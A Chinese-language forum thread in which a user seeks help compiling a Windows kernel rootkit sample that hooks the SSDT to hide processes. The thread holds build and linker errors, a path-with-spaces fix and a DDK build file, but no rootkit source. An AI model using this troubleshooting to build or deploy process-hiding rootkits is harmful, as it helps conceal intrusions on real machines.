|
阅读:3961回复:3
rootkit钩住SSDT隐藏进程
我从网上下载了源代码,但是不能通过编译,编译结果:
BUILD: Adding /Y to COPYCMD so xcopy ops won't hang. BUILD: Using 2 child processes BUILD: Object root set to: ==> objchk_wxp_x86 BUILD: Compile and Link for i386 BUILD: Loading C:\WINDDK\3790~1.183\build.dat... BUILD: Computing Include file dependencies: BUILD: Examining c:\documents and settings\hp\桌面\rootkit\rootkits——windows内 核的安全防护\hideprocesshookmdl directory for files to compile. c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\ hideprocesshookmdl - 1 source files (239 lines) BUILD: Compiling (NoSync) c:\documents and settings\hp\桌面\rootkit\rootkits—— windows内核的安全防护\hideprocesshookmdl directory 1>errors in directory c:\documents and settings\hp\桌面\rootkit\rootkits——wind ows内核的安全防护\hideprocesshookmdl 1>NMAKE : warning U4006: special macro undefined : '$<' 1>Compiling - objchk_wxp_x86\i386 for all platforms 1>NMAKE : warning U4006: special macro undefined : '$<' 1>Compiling - objchk_wxp_x86\i386 for all platforms 1>NMAKE : warning U4006: special macro undefined : '$<' 1>Compiling - objchk_wxp_x86\i386 for all platforms BUILD: Compiling c:\documents and settings\hp\桌面\rootkit\rootkits——windows 内核的安全防护\hideprocesshookmdl directory 101>NMAKE : warning U4006: special macro undefined : '$<' 101>Compiling - objchk_wxp_x86\i386 for all platforms 101>NMAKE : warning U4006: special macro undefined : '$<' 101>Compiling - objchk_wxp_x86\i386 for all platforms 101>NMAKE : warning U4006: special macro undefined : '$<' 101>Compiling - objchk_wxp_x86\i386 for all platforms BUILD: Compile errors: not linking c:\documents and settings\hp\桌面\rootkit\roo tkits——windows内核的安全防护\hideprocesshookmdl directory BUILD: Done 6 files compiled - 6 Errors - 0 LPS 然后我用DriverStudio创建了一个ntdriver(C代码的),把光盘中的源代码添加进去,但是还是出现了问题。用WDK 6000编译出现了一些语法上的问题, 其他的语法错误已经改了,其中MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode); error 不能从PVOID到PVOID*,很无奈。我把MappedSystemCallTable改成了PVOID类型,但是出现了一下连接错误: errors in directory e:\driver\hidepr~1\driver e:\driver\hidepr~1\driver\hideprocesshookmdl.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) struct ServiceDescriptorEntry KeServiceDescriptorTable" (__imp_?KeServiceDescriptorTable@@3UServiceDescriptorEntry@@A) e:\driver\hidepr~1\driver\hideprocesshookmdl.obj : error LNK2019: unresolved external symbol "__declspec(dllimport) long __stdcall ZwQuerySystemInformation(unsigned long,void *,unsigned long,unsigned long *)" (__imp_?ZwQuerySystemInformation@@YGJKPAXKPAK@Z) referenced in function _DriverEntry@8 e:\driver\hidepr~1\driver\objchk_wxp_x86\i386\hideprocesshookmdl.sys : error LNK1120: 2 unresolved externals 这个坎过不去了,请高人指点一下。或者穿一份编译通过的代码给小弟,万分感谢。 |
|
|
|
沙发#
发布于:2009-08-10 16:57
光盘的源代码编译错误是因为驱动程序存放的路径名有空格,我把hideProcessHookMDL放到C盘根目录下,用ddk2003就可以通过了。
不知道是什么原理,但是可以编译出来了。 至于后面自己创建的代码的连接错误还没有解决,大家指点一下啊。 |
|
|
板凳#
发布于:2009-08-11 09:00
可能与你的编译环境有关,我在Windows 2000 Free Build Environment下也编译不过,但改了sources后可以编译了.我用的sources附后:
TARGETNAME=HideProcessHookMDL TARGETPATH=obj TARGETTYPE=DRIVER SOURCES=HideProcessHookMDL.rc \ HideProcessHookMDL.c \ registry.c \ debug.c \ queue.c |
|
|
地板#
发布于:2010-03-02 16:56
这是我从网上下的,编译没问题的,你拿去试一下
|
|
|